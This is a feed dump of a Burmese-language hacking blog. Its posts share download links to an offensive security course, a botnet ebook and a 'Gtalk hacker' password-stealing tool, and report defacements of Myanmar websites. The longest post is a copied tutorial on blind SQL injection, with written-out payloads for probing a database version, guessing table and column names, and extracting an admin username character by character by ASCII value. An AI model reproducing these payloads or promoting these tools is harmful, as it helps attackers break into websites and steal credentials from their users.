tag:blogger.com,1999:blog-29672311800937663502024-03-21T19:29:23.114-07:00ShwekoyantawHacking= Intelligent+Technology+Psychology+Philosophyshwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comBlogger401125tag:blogger.com,1999:blog-2967231180093766350.post-74005984788323536102013-01-26T06:04:00.001-08:002013-01-26T06:04:33.194-08:00Offensive Security Lab Exercises<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVr2z_65TMs6HgEl4OKMP0GiTbhqPL3ij8FG9E0-Mhyphenhyphenzy0NdsP8wQitgC2j_uCiPLoQpqruOoUv4666BK6fgnTWGqE7BS5YW3fWiPP1aOonZWjoL2FVzf_Heb5Qr8zufcQa-v3sgospv4/s1600/untitled.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVr2z_65TMs6HgEl4OKMP0GiTbhqPL3ij8FG9E0-Mhyphenhyphenzy0NdsP8wQitgC2j_uCiPLoQpqruOoUv4666BK6fgnTWGqE7BS5YW3fWiPP1aOonZWjoL2FVzf_Heb5Qr8zufcQa-v3sgospv4/s320/untitled.JPG" width="301" /></a></div>
<br />
စာအုပ္ေကာင္းေလးေတြ႕လို႕တင္ေပးလိုက္တာ .....ေလ့လာၾကည့္ လိုက္ ေတာ္ေတာ္ မိုက္တယ္ဗ်...<br />
ပါလာတဲ့ Module ေတြကေတာ့ေအာက္ပါအတိုင္ျဖစ္ပါတယ္...။<br />
<br />
<ol>
<li>Backtrack Basics<br /> </li>
<li>Information Gathering Techniques<br /> </li>
<li>Open services Information Gathering<br /> </li>
<li>Port Scanning<br /> </li>
<li>ARP Spoofing<br /> </li>
<li>Buffer Overflow Exploitation<br /> </li>
<li>Working with Exploits<br /> </li>
<li>Transferring Files<br /> </li>
<li>Exploit Framework<br /> </li>
<li>Client Side Attacks<br /> </li>
<li>Port Fun<br /> </li>
<li>Password Attack<br /> </li>
<li>Web Application Attack Vector<br /> </li>
<li>Trojan Horses<br /> </li>
<li>Window Oddities<br /> </li>
<li>Rootkits</li>
</ol>
<br />
<a href="http://www.ziddu.com/download/21434683/offensive-security-labs.zip.html" target="_blank">Download</a><br />
<br />
လင့္မေကာင္းလွ်င္ေျပာပါ.......ျပန္တင္ေပးပါမည္ shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-56240837273828977562012-11-02T03:48:00.000-07:002012-11-02T03:48:20.543-07:00Myanmar Hack Forum Has Been Hackedျမန္မာႏုိင္ငံ၏ ပထမဆံုးေသာ Hack Forums ျဖစ္သည့္ <a href="http://mmhackforums.com/">Myanmar Hackforums</a>
ကို အင္ဒိုနီးယား Hacker တစ္ဦးျဖစ္သည့္ cr4wl3r က ႏို၀င္ဘာ ၂ ရက္ေန႕က
ေဖာက္ထြင္းသြားခဲ့သည္ ။ cr4wl3r သည္ Exploit မ်ား ထုတ္ေ၀ေပးေနသည့္
1nj3ct0r အဖြဲ႕၀င္တစ္ဦး ျဖစ္သည္ ။<br />
<div style="text-align: center;">
<a href="http://ghostarea.net/wp-content/uploads/2012/11/Screenshot-from-2012-11-02-155918.png"><img alt="" class="aligncenter wp-image-1707" height="292" src="http://ghostarea.net/wp-content/uploads/2012/11/Screenshot-from-2012-11-02-155918-1024x486.png" title="Screenshot from 2012-11-02 15:59:18" width="614" /><span id="more-1706"></span></a></div>
Cr4wl3r ၏ twitter account မွာ <a href="http://twitter.com/hackb0x">http://twitter.com/hackb0x</a> ျဖစ္ျပီး Mail မွာ cr4wl3r@linuxmail.com ျဖစ္သည္ ။.<br />
Cr4wl3r ေဖာက္ထြင္းခဲ့ေသာ Website မ်ားစာရင္းႏွင့္ Deface Mirror မ်ားကို <a href="http://www.zone-h.org/archive/notifier=cr4wl3r">http://www.zone-h.org/archive/notifier=cr4wl3r</a> တြင္ ေတြ႕ရွိႏိုင္ျပီး <a href="http://exploit-db.com/">exploit-db.com</a> ႏွင့္ သူ၏ Exploit မ်ားကို <a href="http://sh3ll4u.blogspot.de/"> http://sh3ll4u.blogspot.de</a>/ တြင္ ေတြ႕ရွိႏိုင္သည္။ ။<br />
<br />
copy from ghostarea.net shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-6598340718557642482012-10-24T01:30:00.002-07:002012-10-24T01:30:47.402-07:00Botnets The Killer Web Applications(Ebook)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP_BFmvFqGdU5e40BelbJL9kmjqvo8Cy_Cyuxjw1jHWH3OFhO8h34ZLbI0amHUesXAFCz-KI8gdFT8_00Vn4tp_NTP1OqUORH-xbZ7jk5W23p4Dj70HM716aDY9dsW0XpFlTLlXIridCs/s1600/images.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP_BFmvFqGdU5e40BelbJL9kmjqvo8Cy_Cyuxjw1jHWH3OFhO8h34ZLbI0amHUesXAFCz-KI8gdFT8_00Vn4tp_NTP1OqUORH-xbZ7jk5W23p4Dj70HM716aDY9dsW0XpFlTLlXIridCs/s1600/images.jpeg" /></a></div>
<br />
<br />
ပို႕ေတြမတင္ျဖစ္တာလဲၾကာျပီ...သင္တန္းလဲမအားတာနဲ႕ပဲ....ခုေတာ့ဖတ္ခ်င္တဲ့တဲ့ သူငယ္ခ်င္းေတြ အတြက္ စာအုပ္ေလး ရွဲေပးလိုက္ တယ္... soe soe diary ကရတာ ....။လြယ္တယ္ေနာ္..ဟီး ...သူ႕ကိုလဲ ေက်းဇူးတင္ပါတယ္...။<br />
လိုခ်င္ရင္ေအာက္ကေန ေဒါင္းလိုက္ပါ...။<br />
<a href="http://www.blogger.com/goog_1330891759"><br /></a>
<a href="http://www.ziddu.com/download/20697736/Botnets_The_Killer_Web_Applications.rar.html">http://www.ziddu.com/download/20697736/Botnets_The_Killer_Web_Applications.rar.html</a><br />
<a href="http://minus.com/l9B2KTM2Woyao">http://minus.com/l9B2KTM2Woyao</a><br />
<br />
<br />shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-51462777748160085772012-09-13T05:27:00.000-07:002012-09-13T05:27:18.789-07:00Blind Sql Inj3cti0n Yummy Guide <div class="separator" style="clear: both; text-align: center;">
<span rel="lightbox" style="margin-left: 1em; margin-right: 1em;"><img alt="Posted Image" class="bbc_img" src="http://dl.dropbox.com/u/85124794/index.jpg" /></span></div>
<div class="bbc_center">
</div>
<br />
<br />
၀ … ပထမဆုံးေျပာခ်င္တာက …<span style="color: yellow;"> Blind</span> ကသိပ္အခ်ိန္ကုန္လုိ. ၀ တုိ. … အေနနဲ. <span style="color: orange;">Tool </span>သုံးမယ္ဆုိရင္ဘာမွေ၀ဖန္စရာမရိွပါဘူး…. သုံးခ်င္တာသုံးၾကပါ … ဟဲဟဲ…<br />
ဒါပင္မယ့္လည္း … ဘယ္လုိဘယ္လုိ … လုပ္သလဲဆုိတဲ့နည္းေလးတိထားရင္ေကာ မေကာင္းဘူးလား… ??<br />
ဒါေၾကာင့္ဒီဟာကုိေရးတာပါ…<br />
<span style="color: yellow;">Blind</span> ကိုဘာလုိ.သံုးရသလဲဆုိေတာ့ … <span style="color: lime;">DB</span> ထဲမွာ <span style="color: orange;">“information_schema”</span> ဆုိတဲ့ Table ေလးမရိွတာေၾကာင့္ Union ေတြဘာေတြနဲ. Data ကုိထုတ္လုိ.မရဘူး … (version ေအာက္ေနလုိ.ေပါ့)<br />
<br />
<span style="color: goldenrod;">[+]Blind ၂</span>မ်ိဳးရွိပါတယ္ …<br />
<span style="color: darkorange;">၁.Boolean Based (normal blind)</span><br />
<span style="color: cyan;">2.Time Based (time delay)</span><br />
အဲကလုိေပါ့ …<br />
<br />
<span style="color: orange;">[1]Boolean</span><br />
ဥပမာ … ၀တုိ.မွာ … ေဟာဒီ error ျဖစ္ေနတဲ့ ဆုိဒ္ေလးရွိတယ္… ဆုိပါစုိ.<br />
<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span></pre>
<br />
<span style="color: lime;">#</span>သူ.ကို single quote ( ‘ ) ေလးနဲ.စမ္းျပီး… ေနာက္ဆုံး version ေအာက္ေနေတာ့ ေရွ.ဆက္လုိ.မရဘူးဆုိပါေတာ့<br />
<br />
<span style="color: goldenrod;">#</span>တခ်ိဳ.ဆုိဒ္ေတြက … single-quote(‘)
နဲ.စမ္းမရဘူး … ဒါဆုိ Boolean Logic (True or False)ကုိသုံးပါမယ္ … Boolean
ကေတာ့ အလယ္ရာစုက…သခၤ်ာပညာရွင္ၾကီးပါ … Programmer ကုိကုိေတြ
ေကာင္းေကာင္းသိၾကပါတယ္…<br />
အဲဒီေတာ့ ေစာေစာကဆုိက္ရဲ. Variable ေနာက္မွာ<br />
<pre class="prettyprint"><span class="kwd">and</span><span class="pln"> </span><span class="lit">1</span><span class="pun">=</span><span class="lit">1</span></pre>
ဆုိျပီးထည့္ကာစမ္းလုိက္ပါမယ္…<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> </span><span class="lit">1</span><span class="pun">=</span><span class="lit">1</span></pre>
webpage ကပုံမွန္ပဲတက္လာတယ္ … <span style="color: yellow;">no error</span><br />
ဘာလုိ.ဆုိေတာ့ … တစ္က တစ္နဲ.ညီတယ္ဆုိတာ ကေလးေတာင္တိတယ္…ေလ… ဘာလို.error ျပရမွာလဲဟုတ္စ…<br />
ဒီတစ္ခါ<br />
<pre class="prettyprint"><span class="kwd">and</span><span class="pln"> </span><span class="lit">1</span><span class="pun">=</span><span class="lit">2</span></pre>
<br />
ဒါဆုိရင္ link က<br />
<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> </span><span class="lit">1</span><span class="pun">=</span><span class="lit">2</span></pre>
<br />
webpage ကုိသတိထားၾကည့္ပါ…. ပုံတစ္ခ်ိဳ. … စာတစ္ခ်ဳိ.ေျပာက္ေနျပီဆုိိ… error ေပါက္ေနပါျပီ…<br />
1=2 ပဲစမ္းရမယ္လုိ. ပုံေသမရိွပါဘူး… logic အရမွားေနတာေတြၾကိဳက္တာစမ္းလုိ.ရတယ္…. ဥပမာ…<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="lit">100000000001</span><span class="pun">-</span><span class="lit">100000000001</span><span class="pun">=</span><span class="lit">0</span><span class="pln">
www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="lit">100000000001</span><span class="pun">-</span><span class="lit">100000000001</span><span class="pun">=</span><span class="lit">2</span></pre>
အဲလုိမ်ိဳးလဲရေသးတယ္…<br />
<br />
<span style="color: yellow;">#</span><span style="color: firebrick;">Version</span><br />
<pre class="prettyprint"><span class="kwd">and</span><span class="pln"> substring</span><span class="pun">(@</span><span class="lit">@version</span><span class="pun">,</span><span class="lit">1</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="pln">VERSION</span></pre>
version ဆိုတဲ့ေနရာေလးမွာ <span style="color: yellow;">4</span> တစ္ခါ <span style="color: gold;">5</span> တစ္ခါထည့္ပါမယ္…<br />
ဒီေတာ့ျဖစ္လာမယ့္ ပုံစံေလးက…<br />
<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> substring</span><span class="pun">(@</span><span class="lit">@version</span><span class="pun">,</span><span class="lit">1</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="lit">4</span></pre>
page မွန္မွန္ကန္ကန္တက္တဲ့ဟာက … အဲဒီ့ version ေပါ့ … ဟုတ္ဖူူးလား…<br />
<br />
<span style="color: yellow;">#</span><span style="color: darkorange;">TableName</span><br />
<pre class="prettyprint"><span class="pln"> </span><span class="kwd">and</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT </span><span class="lit">1</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> TABLENAME limit </span><span class="lit">0</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="lit">1</span></pre>
<br />
table-name ဆုိတဲ့ေနရာမွာ … ကုိယ္ခန္.မွန္းလုိ. ရသေလာက္ tblname ေတြခန္.မွန္းျပီးထည့္ပါ…<br />
ဒီေတာ့ျဖစ္လာမယ့္ပုံစံက…<br />
<pre class="prettyprint"><span class="pln">
www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT </span><span class="lit">1</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> </span><span class="pun">မရွိတဲ့</span><span class="pln">tablename limit </span><span class="lit">0</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="lit">1</span></pre>
<br />
ဒါဆုိ. … tablename ကတကယ္မရွိတာေၾကာင့္ page က error ေတြနဲ.တက္လာပါတယ္… ဒါဆုိဆက္ျပီးစမ္းပါ …<br />
<span style="color: yellow;">users</span> ဆုိတဲ့ table တစ္ခုခ်ိတယ္.... ဆုိပါစုိ.<br />
<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT </span><span class="lit">1</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> users limit </span><span class="lit">0</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="lit">1</span></pre>
<br />
users ဆုိတဲ့ Table ရွွိတာေၾကာင့္ page ကပုံမွန္တက္လာပါျပီ … notepad မွာ ကုိုယ္သိျပီးတဲ့ tablename ကုိ ခဏမွတ္ထားပါ….<br />
<br />
<span style="color: yellow;">#</span><span style="color: lime;">Columns</span><br />
<br />
<pre class="prettyprint"><span class="kwd">and</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT substring</span><span class="pun">(</span><span class="pln">concat</span><span class="pun">(</span><span class="lit">1</span><span class="pun">,</span><span class="typ">ColumnName</span><span class="pun">),</span><span class="lit">1</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> </span><span class="typ">TableName</span><span class="pln"> limit </span><span class="lit">0</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="lit">1</span></pre>
<br />
TableName = ေစာေစာက ကုိယ္သိျပီးတဲ့ tblname<br />
ColumnName = အခုကုိယ္မွန္းထည့္ရမယ့္ colname<br />
<br />
ဒါဆုိ ပုံစံက …<br />
<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT substring</span><span class="pun">(</span><span class="pln">concat</span><span class="pun">(</span><span class="lit">1</span><span class="pun">,မရွိတဲ့</span><span class="typ">Columnname</span><span class="pun">),</span><span class="lit">1</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> users limit </span><span class="lit">0</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="lit">1</span></pre>
<br />
page ပုံမွန္မတက္ပါ… ဘာလုိ.ဆုိေတာ့ … column name တကယ္ မရွိတာေၾကာင့္ပါ…<br />
admin ဆုိတဲ့ ... column ရွိတယ္ဆုိပါစုိ.<br />
<br />
<pre class="prettyprint"><span class="pln">www</span><span class="pun">.နတ္ဆုိး.</span><span class="pln">net</span><span class="pun">/</span><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">catid</span><span class="pun">=</span><span class="lit">13</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT substring</span><span class="pun">(</span><span class="pln">concat</span><span class="pun">(</span><span class="lit">1</span><span class="pun">,</span><span class="pln">admin</span><span class="pun">),</span><span class="lit">1</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> users limit </span><span class="lit">0</span><span class="pun">,</span><span class="lit">1</span><span class="pun">)=</span><span class="lit">1</span></pre>
<br />
page ပုံမွန္တက္လာျပီ… ဒါဆုိ admin ဆိုတဲ့ column ရိွလုိ.ေပါ့<br />
<br />
<span style="color: yellow;">#</span><span style="color: cyan;">Getting Data</span><br />
အခု data ထုတ္ဖုိ. … ေအာက္က query ကုိသုံးမယ္…<br />
<pre class="prettyprint"><span class="pln">ascii</span><span class="pun">(</span><span class="pln">substring</span><span class="pun">((</span><span class="pln">SELECT concat</span><span class="pun">(</span><span class="pln">COLUMN</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> TABLE</span><span class="pun">),</span><span class="pln">CHARACTER NUMBER</span><span class="pun">,</span><span class="lit">1</span><span class="pun">))></span><span class="pln">ASCII VALUE HERE</span></pre>
<br />
COLUMN = ေစာေစာကကုိယ္သိခဲ့တဲ့ admin column<br />
TABLE = ေစာေစာကကုိယ္သိခဲ့တဲ့ table name<br />
<br />
<a class="bbc_url" href="http://www.asciitable.com/" rel="nofollow external" title="External link"><span style="color: paleturquoise;">www.asciitable.com</span></a> ကုိေသာ္လည္းေကာင္း … hackbar က text-hex ကုိေသာ္လည္းေကာင္း <a class="bbc_url" href="http://easycalculation.com/ascii-hex.php" rel="nofollow external" title="External link"><span style="color: plum;">http://easycalculation.com/ascii-hex.php</span></a><span style="color: plum;"> </span>ကုိေသာ္လည္းေကာင္းသြားပါ<br />
<br />
ASCII VALUE HERE= ဆိုတဲ့ေနရာမွာ … data ရဲ. Ascii value ေတြကုိမွန္းထည့္မွာပါ<br />
ပုံမွန္ site ေတြမွာ username ကုိ special Character ေတြ ...ေပးမထည့္ပါ ... ဒါေၾကာင့္ special character တစ္ခုျဖစ္တဲ့ <span style="color: brown;">@</span> နဲ. စျပီးစစ္ပါမယ္<br />
@ ရဲ. Ascii value က 64 ပါ … ဒါေၾကာင့္အခုလုိ …<br />
<pre class="prettyprint"><span class="kwd">and</span><span class="pln"> ascii</span><span class="pun">(</span><span class="pln">substring</span><span class="pun">((</span><span class="pln">SELECT concat</span><span class="pun">(</span><span class="pln">admin</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> users WHERE id</span><span class="pun">=</span><span class="lit">1</span><span class="pun">),</span><span class="lit">1</span><span class="pun">,</span><span class="lit">1</span><span class="pun">))></span><span class="lit">64</span></pre>
<br />
page မွန္မွန္ကန္ကန္မတက္ဘူး… ဒါဆုိ… username က @ နဲ.မစတာေသခ်ာသြားျပီ … 64 ကုိဆက္တိုးျပီးမွန္းၾကည့္ပါတယ္….<br />
ဆုိပါစုိ. Admin name က<span style="color: gold;"> john </span>လုိ.<br />
<span style="color: yellow;"><span style="font-size: 18px;"><strong class="bbc">J </strong></span></span>ရဲ. Ascii value က 106<br />
ဒါေၾကာင့္ပုံစံက ….<br />
<br />
<pre class="prettyprint"><span class="kwd">and</span><span class="pln"> ascii</span><span class="pun">(</span><span class="pln">substring</span><span class="pun">((</span><span class="pln">SELECT concat</span><span class="pun">(</span><span class="pln">admin</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> users WHERE id</span><span class="pun">=</span><span class="lit">1</span><span class="pun">),</span><span class="lit">1</span><span class="pun">,</span><span class="lit">1</span><span class="pun">))></span><span class="lit">105</span></pre>
<br />
page မွန္မွန္ကန္ကန္တက္လာမယ္ … ဘာလုိ.ဆုိေတာ့<span style="color: firebrick;"> j </span>ဆုိတဲ့ value ကတကယ္ရွိေနလုိ. Ascii value က 105 …<br />
အဲဒီမွာ 106 လုိ.ေျပာင္းထည့္ၾကည့္လိုက္ရင္… error တက္လာမယ္ ဒါဆုိ. … <span style="color: darkorange;">106</span>ကို table မွာသြားဖတ္ရင္ …<span style="color: lime;"> j </span>လုိ.ေတြ.ရလိမ့္မယ္…<br />
<span style="color: firebrick;">ခ်ဳံေျပာရရင္ … error မတက္မခ်င္းေရွ.တုိး… error တက္ရင္ရပ္ … ျပီးရင္ table မွာသြားဖတ္ေပါ့ ….</span><br />
<br />
ပထမတစ္ေနရာျဖစ္တဲ့<span style="color: yellow;"> 1,1</span> ကျပီးသြားျပီ…<br />
ဒုတိယေနရာျဖစ္တဲ့<span style="color: paleturquoise;"> 2,1</span> ကုိေစာေစာကနည္းအတုိင္းစမ္းပါ… “<span style="color: yellow;">O</span>”ရရင္…<br />
စုစုေပါင္း.. 2 လုံးရပါျပီ… “ <span style="color: lime;">j၀</span> “ ဒီနည္းအတုိင္း…. ဆက္ျပီးစမ္းၾကည့္ပါ…<br />
ေတာ္ေတာ္ကုိ …အခ်ိန္ကုန္တဲ့ method မုိ. … ဦးဦး<span style="color: firebrick;"> mhu@larm</span> ေပးထားတဲ့<br />
List of Table & columns ေတြကုိ … copy paste လုပ္ျပီး… Havij လုိ
tool မ်ိဳးမွာ … ထပ္ေပါင္းထည့္ေပးလုိက္ရင္တူူတုိ.က …. AUTO လုပ္ေပးမွာေပါ့…
ဟုတ္ဖူးလား….<br />
<br />
<span style="color: yellow;">[2]Time delay</span> ကုိေရးခ်င္ေတာ့ဖူး…. ဘာလုိ.ဆုိေတာ့ … ကိုယ္ႏိုင္ငံ <span style="color: yellow;">connection </span>ကသိတဲ့အတုိင္းပဲ … အဲဒီ့နည္းက … page loading လုပ္မယ့္အခ်ိန္ကုိ … ကန္.သတ္လုိက္ျပီး… error ေပါက္မေပါက္စစ္တာ …<br />
ဒီမွာစစ္ေနရင္ေတာ့ … ၁နာရီၾကာမွ တစ္ခါတက္တဲ့ loading ဆုိေတာ့ …. ဟူး……<br />
G00Gle မွာအမ်ားၾကီးပါ… ရွာၾကည့္ၾကည့္ေပါ့… မေတြ.ရင္လည္းေျပာေပ့ါ ….<br />
<br />
ဒီနည္းေတြပဲလားဆုိေတာ့ ... ဟုတ္ပါဖူး... တျခားနည္းေတြလည္းရွိေသးတာေပါ့<br />
Error Based နဲ.လည္း... ထုိးလုိ.ရပါေသးတယ္...<br />
<br />
copy from http://mmhackforums.com//index.php?/topic/814-blind-sql-inj3cti0n-yummy-guide/<br />
shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com1tag:blogger.com,1999:blog-2967231180093766350.post-16371419593067847752012-09-10T03:10:00.000-07:002012-09-10T03:10:57.420-07:00Gtalk password hack by fake gtalk<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFYjEGXSA9Dn1vyniWgntwTF4Ef9ihxftjc95TmeKlicLmctagqjQSaWGZDMhpKQ3D8WJsVgTWxlMdk4XktjRhAlVLJc8D1PRD9sgdhr9PvKwHLmRRNTVO9icBu2tjIx3Ac1k17CdGB-4/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFYjEGXSA9Dn1vyniWgntwTF4Ef9ihxftjc95TmeKlicLmctagqjQSaWGZDMhpKQ3D8WJsVgTWxlMdk4XktjRhAlVLJc8D1PRD9sgdhr9PvKwHLmRRNTVO9icBu2tjIx3Ac1k17CdGB-4/s1600/images.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
This is shearing from <a href="http://ehackworld.blogspot.com/2011/02/password-hack-by-fake-gtalk.html">http://ehackworld.blogspot.com/2011/02/password-hack-by-fake-gtalk.html</a> and soesoediary.blogspot.com ........./<br />
<br />
See follow pic:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjteU4VROcLq7GfL7MQGD1Dz2zyqevlQZ3k4bCOcbyDp0h7qm26IaysxGl_2yHbF1FbQAv9EUsorWs66oCFZ5bfJsGSc2kBoXVizVTajRq_NnV0CRLZTgYDB1PnX1f1NyAFr5zZS8J2V1g/s1600/untitled.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjteU4VROcLq7GfL7MQGD1Dz2zyqevlQZ3k4bCOcbyDp0h7qm26IaysxGl_2yHbF1FbQAv9EUsorWs66oCFZ5bfJsGSc2kBoXVizVTajRq_NnV0CRLZTgYDB1PnX1f1NyAFr5zZS8J2V1g/s640/untitled.JPG" width="640" /></a></div>
<br />
Download<br />
<a href="https://www.dropbox.com/s/y508n5186irfhxi/Gtalk%20hacker.rar">https://www.dropbox.com/s/y508n5186irfhxi/Gtalk%20hacker.rar</a><br />
<span class="userContent"><a href="http://www.mediafire.com/?z3bgbju7uw55kl7" rel="nofollow nofollow" target="_blank"><span>http://www.mediafire.com/</span><wbr></wbr><span class="word_break"></span>?z3bgbju7uw55kl7</a></span><br />
shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-576036458977580262012-09-09T23:59:00.001-07:002012-09-09T23:59:31.142-07:00www.mmcybersecurityteam.net is hacked<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia1bD38QzF9SJsAE4C0r2T5r9f2YBh0JoHpKM3KsukEZL85ph7xOnjKIBAiaC7xsfExSpe565tmWe-a6zk_Do1FCVWxfTTW8rUOj_cKL2AS-_k7twb_Ui33McfuOvgOda860XJYNw7mv0/s1600/untitled.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia1bD38QzF9SJsAE4C0r2T5r9f2YBh0JoHpKM3KsukEZL85ph7xOnjKIBAiaC7xsfExSpe565tmWe-a6zk_Do1FCVWxfTTW8rUOj_cKL2AS-_k7twb_Ui33McfuOvgOda860XJYNw7mv0/s640/untitled.JPG" width="640" /></a></div>
<br />
<br />
http://www.mmcybersecurityteam.net<br />
<br />
own by IT^J0k3rshwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-42600947718606611642012-09-04T20:51:00.001-07:002012-09-04T20:59:56.834-07:00RAR and Zip Pass Cracker Tools<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsl7_2o7mzRvUX1Bq2Dum5DbEM7RcyWREeLwygBDr7JrCMzWYPRn3ijWjRuXybRG815vERFlueS0PqMzzOc250OOgYqtxhwscbfaiQpYW0IJ5A-H8T4js5cZQqcn3LxlLHH2KlK-Eqn8k/s1600/rarpasswordunlocker_mainscreen.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsl7_2o7mzRvUX1Bq2Dum5DbEM7RcyWREeLwygBDr7JrCMzWYPRn3ijWjRuXybRG815vERFlueS0PqMzzOc250OOgYqtxhwscbfaiQpYW0IJ5A-H8T4js5cZQqcn3LxlLHH2KlK-Eqn8k/s320/rarpasswordunlocker_mainscreen.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
